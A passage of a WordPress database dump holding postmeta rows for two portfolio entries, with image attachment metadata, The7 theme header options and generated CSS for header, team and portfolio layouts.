(17967,2993,'_edit_lock','1675606980:1'),
(17968,2994,'_wp_attached_file','2022/11/ws18m1.jpg'),
(17969,2994,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:585;s:6:\"height\";i:439;s:4:\"file\";s:18:\"2022/11/ws18m1.jpg\";s:8:\"filesize\";i:263500;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:18:\"ws18m1-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20828;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"ws18m1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8811;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(17970,2993,'_thumbnail_id','2994'),
(17971,2993,'_edit_last','1'),
(17972,2993,'_wpb_vc_js_status','true'),
(17973,2993,'_dt_sidebar_position','disabled'),
(17974,2993,'_dt_sidebar_widgetarea_id','sidebar_1'),
(17975,2993,'_dt_sidebar_hide_on_mobile','0'),
(17976,2993,'_dt_footer_show','1'),
(17977,2993,'_dt_footer_widgetarea_id','sidebar_2'),
(17978,2993,'_dt_footer_hide_on_mobile','0'),
(17979,2993,'_dt_header_title','fancy'),
(17980,2993,'_dt_header_background','normal'),
(17981,2993,'_dt_header_background_below_slideshow','disabled'),
(17982,2993,'_dt_header_transparent_bg_color_scheme','light'),
(17983,2993,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(17984,2993,'_dt_header_transparent_top_bar_bg_opacity','25'),
(17985,2993,'_dt_header_transparent_bg_color','#000000'),
(17986,2993,'_dt_header_transparent_bg_opacity','50'),
(17987,2993,'_dt_header_disabled_background','normal'),
(17988,2993,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(17989,2993,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(17990,2993,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(17991,2993,'_dt_header_disabled_transparent_bg_color','#000000'),
(17992,2993,'_dt_header_disabled_transparent_bg_opacity','50'),
(17993,2993,'_dt_page_overrides_top_margin',''),
(17994,2993,'_dt_page_overrides_right_margin',''),
(17995,2993,'_dt_page_overrides_bottom_margin',''),
(17996,2993,'_dt_page_overrides_left_margin',''),
(17997,2993,'_dt_mobile_page_padding_top',''),
(17998,2993,'_dt_mobile_page_padding_right',''),
(17999,2993,'_dt_mobile_page_padding_bottom',''),
(18000,2993,'_dt_mobile_page_padding_left',''),
(18001,2993,'_dt_fancy_header_layout_heading',''),
(18002,2993,'_dt_fancy_header_title_aligment','center'),
(18003,2993,'_dt_fancy_header_height','300'),
(18004,2993,'_dt_fancy_header_padding-top','0px'),
(18005,2993,'_dt_fancy_header_padding-bottom','0px'),
(18006,2993,'_dt_fancy_header_breadcrumbs_heading',''),
(18007,2993,'_dt_fancy_header_breadcrumbs','disabled'),
(18008,2993,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(18009,2993,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(18010,2993,'_dt_fancy_header_title_heading',''),
(18011,2993,'_dt_fancy_header_title_mode','custom'),
(18012,2993,'_dt_fancy_header_title',''),
(18013,2993,'_dt_fancy_header_title_font_size','30'),
(18014,2993,'_dt_fancy_header_title_line_height','36'),
(18015,2993,'_dt_fancy_header_text_transform','none'),
(18016,2993,'_dt_fancy_header_title_color_mode','color'),
(18017,2993,'_dt_fancy_header_title_color','#ffffff'),
(18018,2993,'_dt_fancy_header_subtitle_heading',''),
(18019,2993,'_dt_fancy_header_subtitle',''),
(18020,2993,'_dt_fancy_header_subtitle_font_size','18'),
(18021,2993,'_dt_fancy_header_subtitle_line_height','26'),
(18022,2993,'_dt_fancy_header_subtitle_text_transform','none'),
(18023,2993,'_dt_fancy_header_subtitle_color_mode','color'),
(18024,2993,'_dt_fancy_header_subtitle_color','#ffffff'),
(18025,2993,'_dt_fancy_header_bg_heading',''),
(18026,2993,'_dt_fancy_header_bg_color','#222222'),
(18027,2993,'_dt_fancy_header_bg_image_origin','featured_image'),
(18028,2993,'_dt_fancy_header_bg_image','a:0:{}'),
(18029,2993,'_dt_fancy_header_bg_repeat','no-repeat'),
(18030,2993,'_dt_fancy_header_bg_position_x','center'),
(18031,2993,'_dt_fancy_header_bg_position_y','center'),
(18032,2993,'_dt_fancy_header_bg_fullscreen','1'),
(18033,2993,'_dt_fancy_header_bg_overlay','0'),
(18034,2993,'_dt_fancy_header_overlay_color','#000'),
(18035,2993,'_dt_fancy_header_bg_overlay_opacity','50'),
(18036,2993,'_dt_fancy_header_scroll_effect','default'),
(18037,2993,'_dt_fancy_header_bg_parallax','0.5'),
(18038,2993,'_dt_fancy_header_responsiveness_heading',''),
(18039,2993,'_dt_fancy_header_responsiveness','enabled'),
(18040,2993,'_dt_fancy_header_responsiveness_switch','778px'),
(18041,2993,'_dt_fancy_header_responsive_height','70'),
(18042,2993,'_dt_fancy_header_responsive_font_size','30'),
(18043,2993,'_dt_fancy_header_responsive_title_line_height','38'),
(18044,2993,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(18045,2993,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(18046,2993,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(18047,2993,'_dt_project_options_back_button',''),
(18048,2993,'_dt_project_options_show_link',''),
(18049,2993,'_dt_project_options_link',''),
(18050,2993,'_dt_project_options_link_target',''),
(18051,2993,'_dt_project_options_link_name',''),
(18052,2993,'_dt_project_options_hide_thumbnail','1'),
(18053,2993,'_dt_project_options_open_thumbnail_in_lightbox','0'),
(18054,2993,'_dt_project_options_related_mode','same'),
(18055,2993,'_dt_project_options_preview','normal'),
(18056,2993,'the7_fancy_title_css','.fancy-header {\n  background-image: url(\'https://gsw2023.com/wp-content/uploads/2022/11/ws18m1.jpg\');\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(18057,2996,'_edit_lock','1675606988:1'),
(18058,2997,'_wp_attached_file','2022/11/ws19m1.jpg'),
(18059,2997,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:643;s:6:\"height\";i:362;s:4:\"file\";s:18:\"2022/11/ws19m1.jpg\";s:8:\"filesize\";i:202670;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:18:\"ws19m1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12876;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"ws19m1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6764;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(18060,2996,'_thumbnail_id','2997'),
(18061,2996,'_edit_last','1'),
(18062,2996,'_wpb_vc_js_status','true'),
(18063,2996,'_dt_sidebar_position','disabled'),
(18064,2996,'_dt_sidebar_widgetarea_id','sidebar_1'),
(18065,2996,'_dt_sidebar_hide_on_mobile','0'),
(18066,2996,'_dt_footer_show','1'),
(18067,2996,'_dt_footer_widgetarea_id','sidebar_2'),
(18068,2996,'_dt_footer_hide_on_mobile','0'),
(18069,2996,'_dt_header_title','fancy'),
(18070,2996,'_dt_header_background','normal'),
(18071,2996,'_dt_header_background_below_slideshow','disabled'),
(18072,2996,'_dt_header_transparent_bg_color_scheme','light'),
(18073,2996,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(18074,2996,'_dt_header_transparent_top_bar_bg_opacity','25'),
(18075,2996,'_dt_header_transparent_bg_color','#000000'),
(18076,2996,'_dt_header_transparent_bg_opacity','50'),
(18077,2996,'_dt_header_disabled_background','normal'),
(18078,2996,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(18079,2996,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(18080,2996,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(18081,2996,'_dt_header_disabled_transparent_bg_color','#000000'),
(18082,2996,'_dt_header_disabled_transparent_bg_opacity','50'),
(18083,2996,'_dt_page_overrides_top_margin',''),
(18084,2996,'_dt_page_overrides_right_margin',''),
(18085,2996,'_dt_page_overrides_bottom_margin',''),
(18086,2996,'_dt_page_overrides_left_margin',''),
(18087,2996,'_dt_mobile_page_padding_top',''),
(18088,2996,'_dt_mobile_page_padding_right',''),
(18089,2996,'_dt_mobile_page_padding_bottom',''),
(18090,2996,'_dt_mobile_page_padding_left',''),
(18091,2996,'_dt_fancy_header_layout_heading',''),
(18092,2996,'_dt_fancy_header_title_aligment','center'),
(18093,2996,'_dt_fancy_header_height','300'),
(18094,2996,'_dt_fancy_header_padding-top','0px'),
(18095,2996,'_dt_fancy_header_padding-bottom','0px'),
(18096,2996,'_dt_fancy_header_breadcrumbs_heading',''),
(18097,2996,'_dt_fancy_header_breadcrumbs','disabled'),
(18098,2996,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(18099,2996,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(18100,2996,'_dt_fancy_header_title_heading',''),
(18101,2996,'_dt_fancy_header_title_mode','custom'),
(18102,2996,'_dt_fancy_header_title',''),
(18103,2996,'_dt_fancy_header_title_font_size','30'),
(18104,2996,'_dt_fancy_header_title_line_height','36'),
(18105,2996,'_dt_fancy_header_text_transform','none'),
(18106,2996,'_dt_fancy_header_title_color_mode','color'),
(18107,2996,'_dt_fancy_header_title_color','#ffffff'),
(18108,2996,'_dt_fancy_header_subtitle_heading',''),
(18109,2996,'_dt_fancy_header_subtitle',''),
(18110,2996,'_dt_fancy_header_subtitle_font_size','18'),
(18111,2996,'_dt_fancy_header_subtitle_line_height','26'),
(18112,2996,'_dt_fancy_header_subtitle_text_transform','none'),
(18113,2996,'_dt_fancy_header_subtitle_color_mode','color'),
(18114,2996,'_dt_fancy_header_subtitle_color','#ffffff'),
(18115,2996,'_dt_fancy_header_bg_heading',''),
(18116,2996,'_dt_fancy_header_bg_color','#222222'),
(18117,2996,'_dt_fancy_header_bg_image_origin','featured_image'),
(18118,2996,'_dt_fancy_header_bg_image','a:0:{}'),
(18119,2996,'_dt_fancy_header_bg_repeat','no-repeat'),
(18120,2996,'_dt_fancy_header_bg_position_x','center'),
(18121,2996,'_dt_fancy_header_bg_position_y','center'),
(18122,2996,'_dt_fancy_header_bg_fullscreen','1'),
(18123,2996,'_dt_fancy_header_bg_overlay','0'),
(18124,2996,'_dt_fancy_header_overlay_color','#000'),
(18125,2996,'_dt_fancy_header_bg_overlay_opacity','50'),
(18126,2996,'_dt_fancy_header_scroll_effect','default'),
(18127,2996,'_dt_fancy_header_bg_parallax','0.5'),
(18128,2996,'_dt_fancy_header_responsiveness_heading',''),
(18129,2996,'_dt_fancy_header_responsiveness','enabled'),
(18130,2996,'_dt_fancy_header_responsiveness_switch','778px'),
(18131,2996,'_dt_fancy_header_responsive_height','70'),
(18132,2996,'_dt_fancy_header_responsive_font_size','30'),
(18133,2996,'_dt_fancy_header_responsive_title_line_height','38'),
(18134,2996,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(18135,2996,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(18136,2996,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(18137,2996,'_dt_project_options_back_button',''),
(18138,2996,'_dt_project_options_show_link',''),
(18139,2996,'_dt_project_options_link',''),
(18140,2996,'_dt_project_options_link_target',''),
(18141,2996,'_dt_project_options_link_name',''),
(18142,2996,'_dt_project_options_hide_thumbnail','1'),
(18143,2996,'_dt_project_options_open_thumbnail_in_lightbox','0'),
(18144,2996,'_dt_project_options_related_mode','same'),
(18145,2996,'_dt_project_options_preview','normal'),
(18146,2996,'the7_fancy_title_css','.fancy-header {\n  background-image: url(\'https://gsw2023.com/wp-content/uploads/2022/11/ws19m1.jpg\');\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(18147,2993,'_wp_page_template','default'),
(18148,2993,'_dt_microsite_primary_menu',''),
(18149,2993,'_dt_microsite_split_left_menu',''),
(18150,2993,'_dt_microsite_split_right_menu',''),
(18151,2993,'_dt_microsite_mobile_menu',''),
(18152,2993,'the7_shortcodes_dynamic_css','a:2:{s:32:\"57d042b9d3ba876d6b1f618ccfe58c6e\";s:6509:\".dt-team-shortcode.team-masonry-shortcode-id-57d042b9d3ba876d6b1f618ccfe58c6e .team-desc {\n  padding: 20px 20px 20px 20px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-57d042b9d3ba876d6b1f618ccfe58c6e .team-author-name,\n.dt-team-shortcode.team-masonry-shortcode-id-57d042b9d3ba876d6b1f618ccfe58c6e .team-author-name a {\n  margin-bottom: 0px;\n  font-weight: bold;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-57d042b9d3ba876d6b1f618ccfe58c6e .team-author p {\n  margin-bottom: 10px;\n  font-weight: bold;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-57d042b9d3ba876d6b1f618ccfe58c6e  .team-media {\n  padding: 0px 0px 0px 0px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-57d042b9d3ba876d6b1f618ccfe58c6e .dt-css-grid .team-media img {\n  max-width: 100%;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-57d042b9d3ba876d6b1f618ccfe58c6e .team-content {\n  margin-bottom: 5px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-57d042b9d3ba876d6b1f618ccfe58c6e  .team-media,\n.dt-team-shortcode.team-masonry-shortcode-id-57d042b9d3ba876d6b1f618ccfe58c6e  .team-media a.rollover,\n.dt-team-shortcode.team-masonry-shortcode-id-57d042b9d3ba876d6b1f618ccfe58c6e  .team-media a.rollover *,\n.dt-team-shortcode.team-masonry-shortcode-id-57d042b9d3ba876d6b1f618ccfe58c6e  .team-media img {\n  border-radius: 10px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-57d042b9d3ba876d6b1f618ccfe58c6e .soc-ico {\n  margin-bottom: 15px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-57d042b9d3ba876d6b1f618ccfe58c6e .soc-ico a {\n  min-width: 26px;\n  min-height: 26px;\n  font-size: 16px;\n  border-radius: 100px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-57d042b9d3ba876d6b1f618ccfe58c6e .soc-ico a:not(:last-child) {\n  margin-right: 4px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-57d042b9d3ba876d6b1f618ccfe58c6e .soc-ico a:before,\n.dt-team-shortcode.team-masonry-shortcode-id-57d042b9d3ba876d6b1f618ccfe58c6e .soc-ico a:after {\n  min-width: 26px;\n  min-height: 26px;\n  padding: inherit;\n}\n.dt-icon-border-on.dt-team-shortcode.team-masonry-shortcode-id-57d042b9d3ba876d6b1f618ccfe58c6e .soc-ico a:before {\n  border: 0px solid transparent;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-57d042b9d3ba876d6b1f618ccfe58c6e .soc-ico a:hover {\n  font-size: 16px;\n}\n#page .dt-team-shortcode.team-masonry-shortcode-id-57d042b9d3ba876d6b1f618ccfe58c6e .soc-ico a:hover .soc-font-icon {\n  color: rgba(255,255,255,0.75);\n  background: none;\n}\n.dt-icon-border-hover-on.dt-team-shortcode.team-masonry-shortcode-id-57d042b9d3ba876d6b1f618ccfe58c6e .soc-ico a:after {\n  border: 0px solid transparent;\n}\n#page .dt-team-shortcode.team-masonry-shortcode-id-57d042b9d3ba876d6b1f618ccfe58c6e .soc-ico a:not(:hover) .soc-font-icon {\n  color: #ffffff;\n  background: none;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-57d042b9d3ba876d6b1f618ccfe58c6e .soc-ico a .soc-font-icon {\n  font-size: 16px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-57d042b9d3ba876d6b1f618ccfe58c6e .filter-bg-decoration .filter-categories a.act {\n  color: #fff;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-57d042b9d3ba876d6b1f618ccfe58c6e:not(.resize-by-browser-width) .dt-css-grid {\n  grid-row-gap: 30px;\n  grid-column-gap: 30px;\n  grid-template-columns: repeat(auto-fill,minmax(,1fr));\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-57d042b9d3ba876d6b1f618ccfe58c6e:not(.resize-by-browser-width) .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-57d042b9d3ba876d6b1f618ccfe58c6e:not(.resize-by-browser-width) .dt-css-grid {\n  display: flex;\n  flex-flow: row wrap;\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-57d042b9d3ba876d6b1f618ccfe58c6e:not(.resize-by-browser-width) .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-57d042b9d3ba876d6b1f618ccfe58c6e:not(.resize-by-browser-width) .dt-css-grid .wf-cell {\n  flex: 1 0 ;\n  max-width: 100%;\n  padding: 15px;\n  box-sizing: border-box;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-57d042b9d3ba876d6b1f618ccfe58c6e.resize-by-browser-width .dt-css-grid {\n  grid-template-columns: repeat(3,1fr);\n  grid-template-rows: auto;\n  grid-column-gap: 30px;\n  grid-row-gap: 30px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-57d042b9d3ba876d6b1f618ccfe58c6e.resize-by-browser-width .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-57d042b9d3ba876d6b1f618ccfe58c6e.resize-by-browser-width .dt-css-grid {\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-57d042b9d3ba876d6b1f618ccfe58c6e.resize-by-browser-width .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-57d042b9d3ba876d6b1f618ccfe58c6e.resize-by-browser-width .dt-css-grid .wf-cell {\n  width: 33.333333333333%;\n  padding: 15px;\n}\n@media screen and (max-width: 1199px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-57d042b9d3ba876d6b1f618ccfe58c6e.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(3,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-57d042b9d3ba876d6b1f618ccfe58c6e.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-57d042b9d3ba876d6b1f618ccfe58c6e.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 33.333333333333%;\n  }\n}\n@media screen and (max-width: 991px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-57d042b9d3ba876d6b1f618ccfe58c6e.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(2,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-57d042b9d3ba876d6b1f618ccfe58c6e.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-57d042b9d3ba876d6b1f618ccfe58c6e.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 50%;\n  }\n}\n@media screen and (max-width: 767px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-57d042b9d3ba876d6b1f618ccfe58c6e.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(1,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-57d042b9d3ba876d6b1f618ccfe58c6e.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-57d042b9d3ba876d6b1f618ccfe58c6e.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 100%;\n  }\n}\n\";s:32:\"d4f3d29c475ebf97cf26d99ef9e65ce5\";s:12869:\".portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.content-bg-on.classic-layout-list article {\n  background: #f7f7f7;\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on.classic-layout-list article {\n  padding-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on.classic-layout-list article:first-of-type {\n  margin-top: 0;\n  padding-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.classic-layout-list.mode-list .post-entry-content {\n  width: calc(100% - );\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.classic-layout-list.mode-list .no-img .post-entry-content {\n  width: 100%;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .filter-bg-decoration .filter-categories a.act {\n  color: #fff;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.mode-masonry) article:first-of-type,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.mode-masonry) article.visible.first {\n  margin-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on:not(.mode-masonry) article {\n  margin-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on:not(.mode-masonry) article:first-of-type,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on:not(.mode-masonry) article.visible.first {\n  margin-top: 0;\n  padding-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.hover-scale article:after {\n  background: -webkit-linear-gradient();\n  background: linear-gradient();\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.gradient-overlay-layout-list article {\n  border-radius: 0px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap {\n  padding: 20px 20px 0px 20px;\n  border-radius: 0px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap *,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-rollover:after {\n  border-radius: 0px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.enable-bg-rollover .post-thumbnail-rollover:after {\n  background: -webkit-linear-gradient();\n  background: linear-gradient();\n}\n.bottom-overlap-layout-list.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container {\n  height: calc(100% - 100px);\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a {\n  width: 44px;\n  height: 44px;\n  line-height: 44px;\n  border-radius: 100px;\n  margin: 10px 5px 10px;\n}\n.content-rollover-layout-list:not(.content-align-center).portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a,\n.gradient-overlay-layout-list:not(.content-align-center).portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a {\n  margin: 10px 10px 10px 0;\n}\n.dt-icon-border-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:before {\n  border-width: 0px;\n  border-style: solid;\n}\n.dt-icon-hover-border-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:after {\n  border-width: 0px;\n  border-style: solid;\n}\n.dt-icon-bg-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:before {\n  background: rgba(255,255,255,0.3);\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.dt-icon-hover-bg-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:after {\n  background: rgba(255,255,255,0.5);\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a > span:before {\n  font-size: 16px;\n  line-height: 44px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:not(:hover) > span {\n  color: #ffffff;\n}\n.dt-icon-hover-off.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a > span,\n.dt-icon-hover-off.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:hover > span {\n  color: #ffffff;\n}\n.dt-icon-hover-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:hover > span {\n  color: 